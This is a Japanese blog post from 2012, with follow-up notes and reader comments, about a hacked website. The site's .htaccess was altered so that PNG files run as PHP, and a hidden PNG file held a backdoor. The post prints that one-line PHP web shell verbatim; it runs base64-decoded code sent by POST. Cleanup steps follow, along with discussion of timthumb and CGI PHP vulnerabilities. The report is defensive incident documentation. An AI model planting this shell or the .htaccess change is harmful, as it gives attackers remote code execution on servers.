正直解決策になっているのかどうかよくわからないのですが日本語のページがほとんどなかったのでメモ。
現象
あるサイトの.htaccessが改ざんされていました。
【元】
AddHandler application/x-httpd-php .html
【改ざん】
AddHandler application/x-httpd-php .png
→「pngファイルをphpととして読み込む」的なもの?
そして.htaccessと同じ階層に、「.****.png」という不可解なファイル。
それをファイルとして開いてみると
<?php ($_=$_POST).($_1=’_’).($_4=$$_1).($_4=$_4[$_1]).($_4($$_1)).eval(base64_decode($_4($$_1)));?>
というコードが記載。なにこれこわい。
※あとファイル更新時間でソートをかけたらindex.bak.phpみたいなファイルがありました(消してしまったのでうろ覚え)。
応急処置
色々と情報を集めてみたのですが、POSTデータを実行している云々で実際の挙動に何が起こっているのか正直よくわかりませんでした。
ひとまずの応急処置として
1..****.pngのデータを削除
2.パスワード関連全変更
3..htaccessの修正。
AddHandler application/x-httpd-php .png
→pngをhtmlに修正
4.index.bak.phpの削除
といった対処をしています。
もしなにか分かる情報(「こうした方がいいよ!」とか)があれば教えていただけるとありがたいです!
※追記(2012.5.18 8:44a.m.)
ロリポップのサーバーで起こった事例、という情報をいただいています(2件)。
※一番下に追記しています。
※追記(2012.5.22 6:48a.m.)
こちらのブログでも同様の手口だったということです。(上記2件以外)
.htaccessの改ざんを受けていた | ZF-Exブログ
http://www.php-zfex.jp/blog/2012/05/21/htaccess-kaizan/
また別にロリポップに問い合わせた方から回答をいただいていますので引用させていただきます。ご連絡ありがとうございます!
※その方からいただいたものでロリポップからの原文ママではないです、多分・・・
「問題のファイルは通常のFTP接続ではなく、何らかのプログラムを用いて直接アップロードされているようだ。その送信元までは分からない。」
「設置してるスクリプトの脆弱性を確認して下さい。PCのウィルスチェックもして下さい。」
ロリポップが原因かはわからないので他の事例があれば随時募集しています。もちろんロリポの事例でも。
追記(2012.5.23 0:14a.m.)
「ロリポップは関係ないのではないか?」というコメントをいただきました。
おそらく、timthumb.phpの脆弱性を狙い撃ちしているようですね。lolipopだけの問題ではないようです。
TimThumbに関しては私も知らなかったのですがWPであれば脆弱性対策プラグインが出ているとのことです。
TimThumbの脆弱性対策プラグイン – Timthumb Vulnerability Scannerの使い方 | WP SEOブログ
※ちなみに自分の該当したサイトでは検出されませんでした。
また同トピックスを扱った「WordPressサイトの.htaccessが改ざんされている件 – 謎のindex.bak.php | WP SEOブログ」記事内でロリポップ側からのコメントが記載されているので掲載します。
まずロリポップ公式twitterのコメント。
@pacificus ブログ拝見させていただきました。要因としてブログに掲載のプラグインなどの脆弱性の他に、今月確認されたPHPの脆弱性を悪用されているケースもございます。PHPの脆弱性は対策済みとなっております。http://t.co/o4aFd4zy
— ロリポップ!レンタルサーバー&マネージドクラウド (@lolipopjp) May 22, 2012
以下は同サイト(WP SEOブログ)に掲載されているロリポップ側の回答。
ロリポップ!レンタルサーバーにおいて、不具合の発生する障害やサーバーの動作については確認されませんでした。
可能性としてWordPressの脆弱性が予想されますが、すでに該当ファイルが削除されているため、原因を特定するまでには至りませんでした。
様子を観て頂き、同様の現象が発生した場合、該当のファイルはサーバー上に残したまま、ご連絡ください。
※)該当のファイルは名前を変更いただくか、パーミッションを「000」に変更いただいた形でご連絡ください。
該当の設置日時やファイルの設置状況からこちらでも調査させていただきます。
自分のサイトでも紛らわしい記述をして申し訳ありません。
最終的な結論(2012.5.24 8:24a.m.)
CGI版PHPの脆弱性を突かれた問題なのではないか?という話に収束しつつあるようです。
原因はCGI版PHP脆弱性?
.htaccess改ざんの件、恐らく完結 | ZF-Exブログ
もう既に自分の頭では全く追いつかないところにいってしまっているのですが、
・ひとまず現状の環境は対応済
・怪しいファイルがあった場合、修正してね
といった感じでおkなのでしょうか。
※余談
今回、予想以上に広がった話ですが三人寄れば文殊の知恵と言いますか、こういう解決の糸口が見つかるのは興味深かったです。
初めまして、Straysheepと申します。
自分もロリポップにて運営しているサイトで同じ改ざんを受けました。
私もパスワードを変更し、関連するファイルを削除しましたが
それ以上の攻撃をされている痕跡が見つからなかったのが不気味ですね。
念のためロリポップにも事例報告しておきました。
はじめまして!
ブログ拝見させていただきました!
仰るとおり意図というか攻撃が過度ではないところは気になりますね・・・
また何かあれば更新していきたいと思いますのでよろしくお願いします!
自宅サーバのアクセスログを確認してみると、
15日の404errorがこのようになっています。
/wp-content/plugins/cac-featured-content/timthumb.php: 1 Time(s)
/wp-content/plugins/category-grid-view-gal … es/timthumb.php: 1 Time(s)
/wp-content/plugins/category-list-portfoli … ts/timthumb.php: 1 Time(s)
/wp-content/plugins/cms-pack/timthumb.php: 1 Time(s)
おそらく、timthumb.phpの脆弱性を狙い撃ちしているようですね。lolipopだけの問題ではないようです。
ありがとうございます!
追記させていただきます。お騒がせして申し訳ありません。
WP SEOブログ様の方で、CGI版PHPの脆弱性の問題ではないかという報告がありました。
自分のアクセスログでもそこに対する攻撃の記録が残っており、
これで間違いないかと思います。
ロリポップについては今は対策してあるようです。
ご連絡いただきありがとうございます!
追記で記載させていただきました。
自分は知識がそんなに深くないため、WP SEOブログさんやStraysheepさんのブログを参考にさせていただいています!
[…] 【メモ】.htaccess改ざん事例(.htaccess/png/eval)※追記あり(5/24 8:24a.m.) […]